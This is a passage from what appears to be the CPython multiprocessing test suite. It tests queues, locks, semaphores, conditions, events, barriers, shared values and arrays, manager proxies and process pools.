# bpo-30414: verify feeder handles exceptions correctly
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
def __reduce__(self):
raise AttributeError
with test.support.captured_stderr():
q = self.Queue()
q.put(NotSerializable())
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
close_queue(q)
with test.support.captured_stderr():
# bpo-33078: verify that the queue size is correctly handled
# on errors.
q = self.Queue(maxsize=1)
q.put(NotSerializable())
q.put(True)
try:
self.assertEqual(q.qsize(), 1)
except NotImplementedError:
# qsize is not available on all platform as it
# relies on sem_getvalue
pass
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Check that the size of the queue is correct
self.assertTrue(q.empty())
close_queue(q)
def test_queue_feeder_on_queue_feeder_error(self):
# bpo-30006: verify feeder handles exceptions using the
# _on_queue_feeder_error hook.
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class NotSerializable(object):
"""Mock unserializable object"""
def __init__(self):
self.reduce_was_called = False
self.on_queue_feeder_error_was_called = False
def __reduce__(self):
self.reduce_was_called = True
raise AttributeError
class SafeQueue(multiprocessing.queues.Queue):
"""Queue with overloaded _on_queue_feeder_error hook"""
@staticmethod
def _on_queue_feeder_error(e, obj):
if (isinstance(e, AttributeError) and
isinstance(obj, NotSerializable)):
obj.on_queue_feeder_error_was_called = True
not_serializable_obj = NotSerializable()
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
q = SafeQueue(ctx=multiprocessing.get_context())
q.put(not_serializable_obj)
# Verify that q is still functioning correctly
q.put(True)
self.assertTrue(q.get(timeout=support.SHORT_TIMEOUT))
# Assert that the serialization and the hook have been called correctly
self.assertTrue(not_serializable_obj.reduce_was_called)
self.assertTrue(not_serializable_obj.on_queue_feeder_error_was_called)
def test_closed_queue_put_get_exceptions(self):
for q in multiprocessing.Queue(), multiprocessing.JoinableQueue():
q.close()
with self.assertRaisesRegex(ValueError, 'is closed'):
q.put('foo')
with self.assertRaisesRegex(ValueError, 'is closed'):
q.get()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def assertReachesEventually(self, func, value):
for i in range(10):
try:
if func() == value:
break
except NotImplementedError:
break
time.sleep(DELTA)
time.sleep(DELTA)
self.assertReturnsIfImplemented(value, func)
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
self.assertReachesEventually(lambda: get_value(woken), 6)
# check state is not mucked up
self.check_invariant(cond)
def test_notify_n(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
self.addCleanup(p.join)
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
self.addCleanup(t.join)
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake some of them up
cond.acquire()
cond.notify(n=2)
cond.release()
# check 2 have woken
self.assertReachesEventually(lambda: get_value(woken), 2)
# wake the rest of them
cond.acquire()
cond.notify(n=4)
cond.release()
self.assertReachesEventually(lambda: get_value(woken), 6)
# doesn't do anything more
cond.acquire()
cond.notify(n=3)
cond.release()
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.monotonic()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.monotonic() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=support.LONG_TIMEOUT))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
join_process(p)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(60))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 60)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
p.join()
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
